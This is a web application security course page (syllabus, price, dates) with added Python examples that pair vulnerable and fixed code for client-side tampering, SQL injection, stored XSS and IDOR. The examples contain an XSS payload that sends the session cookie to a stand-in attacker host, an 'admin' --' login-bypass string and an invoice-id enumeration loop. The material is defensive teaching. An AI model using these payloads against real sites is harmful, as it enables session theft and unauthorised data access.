
Course:

Web application (in)security

Advanced

40 hours

Lecture materials

Certificate of attendance

Why this course?

This course guides participants through the field of web application hacking. The first part of the course, lasting 3 days, gives an overview of the protocols, tools and common attack vectors associated with web applications, with demonstrations and explanations of those attacks. The second part, lasting 2 days, lets participants consolidate their knowledge through hands-on work in a virtual lab environment.

The course covers a thorough examination of commonly used and widely recognised attacks on both the server side and the client side of web applications. It deals with server-side injections such as SQL injection, LDAP injection and OS command injection, and with client-side attacks, including cross-site scripting (XSS) and cross-site request forgery (CSRF). It also covers attacks on authentication, including password cracking and techniques for bypassing the login process, and attacks on authorisation, including insecure direct object references (IDOR) and API abuse. Finally, by studying logic flaws, participants gain insight into interesting attack scenarios uncovered during penetration tests.

To build a comprehensive understanding of hacking and security, it is essential to examine the inner mechanisms of computer systems, so the course includes a study of buffer overflows. The course closes with a series of case studies focused on the supply-chain attack vector and on attacks through widely used applications such as Atlassian Confluence and VMware vCenter Server. This segment lets participants understand the problems caused by improperly maintained applications, the Log4j vulnerability and supply-chain attacks, giving valuable insight into real-world scenarios and sharpening their ability to deal with the challenges that arise.

Cloud, DevSecOps and CI/CD are the present and very likely the long-term future of application development and deployment. Understanding the security risks of the CI/CD process is imperative for every developer. The course covers the most important security risks in the CI/CD process and defines the protective measures that can be applied.

This course will be particularly useful for anyone involved in web application development who wants to understand the relevant attack vectors and vulnerabilities in order to design and build more secure web applications.

Web Application Security

Who is this course for?

The course is intended for anyone interested in understanding attacks on web applications and the techniques for defending against them; anyone interested in the weaknesses of web technologies that let malicious users compromise them; anyone interested in ethical hacking; software developers, DevOps specialists, security analysts, security professionals, system engineers, network administrators, IT professionals, security consultants and others responsible for secure development, deployment, maintenance and security in general.

Prerequisites:

Basic programming knowledge is desirable but not required, since the training does not rely on in-depth application coding. An understanding of coding fundamentals and of how web applications are deployed, of networking principles, architecture and protocols, and of the basic use and administration of Windows and Linux operating systems is desirable.

Kali Linux will be used for most of the labs, so basic familiarity with navigating and using a Linux OS is mandatory.

Additional note:

This course cannot be attended online.

Course syllabus:

1. Security concepts

In this short introductory module, participants will learn basic security concepts such as the CIA and DAD triads, defense in depth, etc. Current risks and threats will also be discussed.

2. Overview of the web technologies and frameworks

This module sets the foundations for the rest of the course. Participants will learn about the web technologies most used today, such as Java, .NET and PHP, the HTTP protocol itself, and session cookies. The fundamental problems behind web application insecurity will be outlined.

3. OWASP and the tools to have on hand

The OWASP Top 10 and the OWASP Testing Guide will be discussed in this module. To assess a web application's security, one must understand the protocols used (discussed earlier) and the tools, such as web debugging proxies, that help identify inputs and errors in the tested application. With a web debugging proxy (Burp Suite, ZAP, WebScarab, Fiddler, etc.) one can easily map the application and identify the parameters it uses.
Hands-on exercise*: Participants will use the Burp proxy to map the web application, and the ZAP proxy (a free tool) for automated scanning and file/directory enumeration (forced browsing).

4. Security risks of CI/CD

This module covers the top security risks to CI/CD pipelines and reviews the protections that can be used to defend CI/CD environments, based on CISA recommendations.

5. Bypassing client-side controls

The critical vulnerability vector in web applications today is trust in client input: anything the browser sends (hidden form fields, JavaScript validation, disabled controls, cookies) is under the attacker's control once the request passes through a proxy. Client-side controls and how they are evaded are reviewed thoroughly in this module.
Hands-on exercise*: Participants will change the web application's behaviour by modifying client-side data with the Burp or ZAP debugging proxy.
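An added example, not part of the course materials, of the kind of client-side trust this module's exercise exploits: a checkout handler that takes the price and the "max 5 items" limit from the browser, beside the version that recomputes both on the server. The product catalogue, the form dictionaries and the hypothetical `sku`/`qty`/`price` field names are constructed for the demo.

```python
"""Added example (not from the course): trusting client-supplied data.
CATALOGUE and the form dictionaries are constructed for the demo."""

# Server-side source of truth. Constructed catalogue: SKU -> unit price.
CATALOGUE = {"sku-100": 49.90, "sku-200": 899.00}

MAX_QTY = 5  # the limit the page's JavaScript also enforces, for convenience only


def checkout_vulnerable(form):
    # The hidden <input name="price"> and the client-side quantity check are
    # both under the attacker's control once the request sits in Burp or ZAP:
    # the server multiplies whatever arrives.
    qty = int(form["qty"])
    return round(float(form["price"]) * qty, 2)


def checkout_safe(form):
    # The server re-derives the price from its own catalogue and re-validates
    # the limits; the client-side script was never a security control.
    sku = form["sku"]
    if sku not in CATALOGUE:
        raise ValueError("unknown product")
    qty = int(form["qty"])
    if not 1 <= qty <= MAX_QTY:
        raise ValueError("quantity out of range")
    return round(CATALOGUE[sku] * qty, 2)


if __name__ == "__main__":
    # Constructed request as edited in an intercepting proxy: 50 units of the
    # expensive product at a tampered unit price of 0.01.
    tampered = {"sku": "sku-200", "qty": "50", "price": "0.01"}
    print("vulnerable total:", checkout_vulnerable(tampered))
    try:
        print("safe total:", checkout_safe(tampered))
    except ValueError as err:
        print("safe handler rejected request:", err)
```

The point the exercise makes is that the proxy turns every client-side check into a suggestion; the only checks that count are the ones the server performs on data it trusts.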

6. Authentication attacks

This module explains the different authentication mechanisms (HTML form-based authentication, multi-factor authentication, client- and server-side certificates and smart cards, HTTP Basic and Digest authentication, Windows integrated authentication, etc.). PKI (public key infrastructure), one of the most important concepts behind authentication and secure communication over the Internet, is explained in more detail. Using the Burp debugging proxy to perform brute-force attacks against a web application will be presented, along with the Hydra and wfuzz tools, which achieve the same result.

7. Web application attacks: Injection

This module defines and explains different injection attacks: SQL injection, LDAP injection and OS command injection. Participants will understand the level of access an attacker can gain through them.
Hands-on exercise*: Participants will try different injection attacks. sqlmap will be used to perform SQL injection attacks, while wfuzz will be used to identify injection points.
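An added example, not part of the course materials, of the login-bypass injection this module's exercise targets: the same credential lookup written with string concatenation and with bound parameters, run against a constructed in-memory SQLite table. The user names, passwords and the `admin' --` payload are made up for the demo; the tools named in the module (sqlmap, wfuzz) find and exploit exactly this class of sink.

```python
"""Added example (not from the course): SQL injection in a login check.
The users table, accounts and passwords below are constructed for the demo."""
import hashlib
import sqlite3


def build_db():
    # In-memory database with a constructed users table. SHA-256 is used only
    # to keep the example self-contained; real systems need a slow password
    # hash such as argon2 or bcrypt.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT)")
    for user, pw in (("admin", "S3cret!Adm1n"), ("alice", "wonderland")):
        conn.execute("INSERT INTO users VALUES (?, ?)",
                     (user, hashlib.sha256(pw.encode()).hexdigest()))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    # The username is concatenated straight into the SQL text, so a value such
    # as  admin' --  closes the string literal and comments out the password
    # check. The password itself is hashed before it reaches the query, so it
    # cannot carry a payload; the single quote in the username is enough.
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND pw_hash = '" + pw_hash + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    # Same query, but both values travel as bound parameters: the driver never
    # treats them as SQL, so the quote and the comment marker stay literal.
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND pw_hash = ?",
        (username, pw_hash)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    payload = "admin' --"
    print("vulnerable, payload   :", login_vulnerable(db, payload, "anything"))
    print("parameterised, payload:", login_safe(db, payload, "anything"))
    print("parameterised, real   :", login_safe(db, "admin", "S3cret!Adm1n"))
```

The vulnerable query logs in as `admin` with any password; the parameterised one looks for a user literally named `admin' --` and finds nothing. Parameterisation fixes the query, but the lab's other injection families (LDAP, OS command) need the equivalent separation of data from syntax in their own APIs.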

8. Web application attacks: XSS/CSRF

XSS is another form of injection, this time into the page the browser renders. In this module the XSS (Cross-Site Scripting) types (stored, reflected, DOM-based) are outlined. Additional attention is given to CSRF (Cross-Site Request Forgery) attacks and the ways to prevent them. To show how dangerous XSS vulnerabilities can be, the BeEF (Browser Exploitation Framework) is used.
Hands-on exercise*: Participants will use an XSS vulnerability to steal session information and impersonate the vulnerable application's administrator.

9. Web application attacks: Broken access control

HTTP is stateless by design: it has no notion of a session, so applications build one on top of it, usually with a cookie, and the way that cookie is issued and carried decides how hard the session is to steal. This module covers typical session management issues.
Hands-on exercise*: The exercise demonstrates how a user's session can be hijacked by stealing cookies, and the problems that result from carrying the session identifier in request parameters.
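An added example, not part of the course materials, that ties modules 8 and 9 together: a comment field rendered without output encoding (the stored-XSS sink the module 8 exercise uses to read the administrator's cookie), the same rendering with encoding, the Set-Cookie attributes that keep even a successful injection from reaching the session cookie, and a check for session identifiers carried in the query string (the module 9 problem). The payload, cookie names, `attacker.example` and `app.example` URLs are constructed for the demo.

```python
"""Added example (not from the course): XSS session theft and its mitigations.
The comment text, cookie names and URLs are constructed for the demo."""
import html
from urllib.parse import parse_qs, urlparse

# Constructed attacker payload, as it would be stored in a comment field: it
# sends document.cookie to a host the attacker controls.
XSS_PAYLOAD = ('<script>new Image().src='
               '"https://attacker.example/c?"+document.cookie</script>')


def render_comment_vulnerable(author, text):
    # User input is spliced into HTML unchanged: a stored XSS sink.
    return f"<div class='comment'><b>{author}</b>: {text}</div>"


def render_comment_safe(author, text):
    # Output encoding for the HTML-body context; html.escape also quotes " and '.
    return (f"<div class='comment'><b>{html.escape(author)}</b>: "
            f"{html.escape(text)}</div>")


def session_cookie_header(session_id, hardened=True):
    """Build the Set-Cookie header that issues the session id.

    hardened=False reproduces the weak form: a bare cookie that any injected
    script can read and that the browser also sends over plain HTTP."""
    if not hardened:
        return f"Set-Cookie: sessionid={session_id}; Path=/"
    # HttpOnly: document.cookie cannot read it, so the payload above gets an
    # empty string. Secure: never sent over cleartext. SameSite=Lax: not
    # attached to cross-site POSTs, which removes most CSRF at the transport
    # level. The __Host- prefix makes the browser enforce Secure and Path=/.
    return (f"Set-Cookie: __Host-sessionid={session_id}; Path=/; "
            "HttpOnly; Secure; SameSite=Lax")


def cookie_readable_by_script(set_cookie_header):
    # Parse the attribute list and report whether document.cookie exposes it.
    attrs = [a.strip().lower() for a in set_cookie_header.split(";")[1:]]
    return "httponly" not in attrs


def session_in_query_string(url, names=("sessionid", "jsessionid", "phpsessid")):
    # A session token in the URL leaks through Referer headers, proxy and web
    # server logs, bookmarks and browser history; report any such parameter.
    query = parse_qs(urlparse(url).query)
    return [p for p in query if p.lower() in names]


if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", XSS_PAYLOAD))
    print(render_comment_safe("mallory", XSS_PAYLOAD))
    for hardened in (False, True):
        hdr = session_cookie_header("3f9a1c", hardened=hardened)
        print(hdr, "-> readable by script:", cookie_readable_by_script(hdr))
    print(session_in_query_string("https://app.example/home?sessionid=3f9a1c&x=1"))
```

Encoding the output closes the injection; `HttpOnly` limits the damage if another sink is missed; keeping the identifier out of the URL closes the leak path the second half of the exercise demonstrates. All three are needed, since each addresses a different failure.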

10. Web application attacks: Insecure direct object references

Many security issues are still caused by insecure direct object references and by inadequate access checks when users request different objects. IDOR (Insecure Direct Object Reference) problems are explained in this module.
Hands-on exercise*: The exercise demonstrates how inadequately implemented controls can lead to the loss of sensitive information or even to elevation of privilege.
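An added example, not part of the course materials, of the IDOR this module's exercise demonstrates: an invoice endpoint that checks only that the caller is logged in, beside the same endpoint with an ownership check decided from the server-side session, plus the id-walking loop an attacker (or wfuzz, from module 7) runs against each. The invoice store, user names and roles are constructed for the demo; the same pattern applies to the API endpoints of module 12.

```python
"""Added example (not from the course): insecure direct object reference.
INVOICES and ROLES are a constructed data store for the demo."""

# Sequential, guessable ids: once one is known, the rest can be enumerated.
INVOICES = {
    1001: {"owner": "alice", "amount": 120.0},
    1002: {"owner": "bob", "amount": 980.0},
    1003: {"owner": "alice", "amount": 45.5},
}
ROLES = {"alice": "user", "bob": "user", "carol": "auditor"}


class Forbidden(Exception):
    """Raised where a real handler would return HTTP 403."""


def get_invoice_vulnerable(session_user, invoice_id):
    # Authenticated but not authorised: the session only proves someone is
    # logged in, and the handler never compares the caller to the record.
    return INVOICES.get(invoice_id)


def get_invoice_safe(session_user, invoice_id):
    # Authorisation is decided from the server-side session, never from a
    # client-supplied field: the caller must own the record or hold a role
    # that may read every record.
    invoice = INVOICES.get(invoice_id)
    if invoice is None:
        return None
    if invoice["owner"] != session_user and ROLES.get(session_user) != "auditor":
        # Returning the same response as "not found" would avoid confirming
        # that the id exists; a distinct error is raised here to make the
        # check visible in the demo.
        raise Forbidden(f"{session_user} may not read invoice {invoice_id}")
    return invoice


def enumerate_as(session_user, fetch, start=1000, stop=1010):
    # What the attacker does with one valid session: walk the id space and
    # keep whatever the endpoint hands back.
    found = {}
    for invoice_id in range(start, stop):
        try:
            invoice = fetch(session_user, invoice_id)
        except Forbidden:
            continue
        if invoice is not None:
            found[invoice_id] = invoice["owner"]
    return found


if __name__ == "__main__":
    print("bob, vulnerable endpoint:", enumerate_as("bob", get_invoice_vulnerable))
    print("bob, checked endpoint   :", enumerate_as("bob", get_invoice_safe))
    print("carol (auditor), checked:", enumerate_as("carol", get_invoice_safe))
```

The fix is not to hide the ids (unguessable ids only slow enumeration down) but to make every object access pass through an authorisation check against the authenticated principal.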

11. Web application attacks: Security misconfiguration

Every application depends on the infrastructure it is deployed on. If any software is outdated or unnecessary features are enabled, an attacker can abuse this to gain access to the target web application or website. Quite often, improper error handling leaks sensitive data to the attacker, or the attacker retrieves sensitive information from incorrectly configured web servers. This module provides several interesting examples.
Hands-on exercise*: An incorrectly configured server is introduced as part of the exercise, during which participants will gain access to sensitive files by using the application's poorly configured credentials.

12. Web Application attacks: Web services and API attacks

Today, web services play a crucial role in web application security and usage. Unprotected web services expose the infrastructure to further attacks. The rise of API (Application Programming Interface) usage over the last decade has revived IDOR and at the same time increased authentication- and authorisation-related attacks. This module reviews attacks on web services and APIs and how to prevent them.
Hands-on exercise*: Participants will attack a poorly configured API to gain access to unprotected features and compromise the application.

13. Logical flaws

Perhaps the most dangerous errors in web applications are those in the application's own logic. Even well-written applications with tight security have been hacked because of logic flaws that permit something the developer did not intend. Logic flaws usually give an attacker privileged access to applications and data, circumventing otherwise well-secured systems. This module reviews these kinds of errors, including walkthroughs of real-world examples.

14. BoF - Buffer overflow

Talking about web application security, or security in general, without mentioning buffer overflows is like starting to watch a film 30 minutes after it has begun. In this module participants will gain insight into how a BoF works.
Hands-on exercise*: Participants will prepare and write a BoF exploit from scratch (starting with simple fuzzing and ending with a reverse shell).

CERTIFICATION
  • Participants receive a certificate of attendance for the Web application (in)security course if they attend at least 70% of the total course hours.

1700.00 KM

    The price excludes VAT.

    The goal of the course is to teach you:

  • Basic security concepts
  • Security aspects of web technologies
  • How web applications can be attacked and how to defend against those attacks
  • Basics of BoF (Buffer Overflow)
  • Types of attacks on authentication
  • Types of attacks on web applications: Injection (A1), XSS/CSRF (A3/A8), Broken authentication and session management (A2) (OWASP Top 10 2013 numbering)

    What do I get?

    40 hours of course access

    Lecture materials

    Certificate of attendance

    Details

    Start: 13 May 2024
    End: 17 May 2024
    Mon, Tue, Wed, Thu, Fri, 08:00-16:00
    40 hours
    LANACO Tehnološki centar
    Veljka Mlađenovića bb
    Banja Luka
    (Incel Business Zone)
    Online attendance not possible
